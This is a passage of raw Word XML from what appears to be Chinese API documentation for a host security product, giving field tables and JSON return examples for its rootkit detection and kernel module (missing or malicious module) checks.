          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DFAB457" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E55861" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件访问权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="30358832" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ED32A8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6613E88A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24CCF25E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="657AB9C4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件SHA1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05861F8A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B6A089" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49396E5A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B4B5095" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="535F2E75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E8A357D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0574AD3B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68265778" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21F688C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09EA59F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1:中危 ,2:高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7C8C7FB8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1732F7AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19542D52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D5B603B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45878F2D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命中的crontab内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6A7E63F5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350CB5E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43AAFC5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11A06463" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5137F352" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>命中crontab内容的文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DCD9FAC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24735204" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>"detail":{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "extra_info":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha256":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "modify_time":1550564341,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_md5":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_sha1":"",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "check_type":"dirs",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "access_time":1550564341,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rootkit_name":"ddgs3011 rootkit",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_permission":"rwx-wx---",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "change_time":1550564341,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_name":"/var/spool/cron/crontabs",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_owner":"root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_size":4096,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_group":"crontab"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>已知rootkit二期</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"detail": "{\"rootkit_name\":\"Fuckit Rootkit\",\"files\":[{\"extra_info\":\"\",\"file_sha256\":\"6ea43b2ef985f10fbbebf1aff9c302e1f448395</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>bbf548aed1c1511d03aa5a72d\",\"file_md5\":\"91f94b1ccffbd4381f86eaaf98fcb4b2\",\"file_sha1\":\"d1e0248ea42947ae405a9613f51d30fd8dc22074\",\"check_type\":\"core\",\"access_time\":1554717866,\"modify_time\":1554717797,\"file_permission\":\"rw - r--r--\",\"change_time\":1554717866,\"file_name\":\"/etc/1\",\"file_owner\":\"root\",\"file_size\":5,\"file_group\":\"root\"}],\"level\":3,\"crontab\":[{\"rule\":\"abcd\",\"file\":\"/etc/hosfilt\"}]}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771E36B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="240" w:name="检查功能系统内核模块检查"/>
      <w:bookmarkEnd w:id="239"/>
      <w:r>
        <w:t>检查功能：系统内核模块检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D25434C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="241" w:name="缺失模块检查"/>
      <w:r>
        <w:t>缺失模块检查</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7993A587"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="66DCCE4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04233F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D05163" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CF27D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="163769A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39FDC82E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FE29D36" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>add</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73B60086" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="283F01B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143114F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>多余模块(lsmod相对/proc/modules)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2CF955A8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57F569FF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>lack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF03AF1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2712318E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0003CDC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>缺失模块(lsmod相对/proc/modules)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7457E120" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A648125" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "add": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "lack": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "udp_diag",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "binfmt_misc",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "tcp_diag",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "inet_diag",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "bnep",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "bluetooth"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBB5C0F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="242" w:name="恶意内核模块"/>
      <w:bookmarkEnd w:id="241"/>
      <w:r>
        <w:t>恶意内核模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC76957"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1775"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1791"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="6344164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F2109CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71818CC1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1201CA6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69BF198D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3332450E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46179CC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>malicious_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E54E5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01FC0CBF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D81AF63" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>恶意模块名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="50D81323" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A8FFDA2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7101F7A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7385DC23" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="715B2645" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60B0B9E4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C62F91D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BFB8761" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B8576C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2A37F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="283B2605" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76D85982" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64EECFD4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38A7DEBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B18F9FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3AA6B361" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="002E4FC2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BB672F6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="716504A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B709F93" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B145582" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="283C5613" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DBED578" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D1029C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="401F47DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5E37BD81" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26211181" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA93AF5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4047B294" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="199AAEFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76"/>
        </w:tc>
      </w:tr>
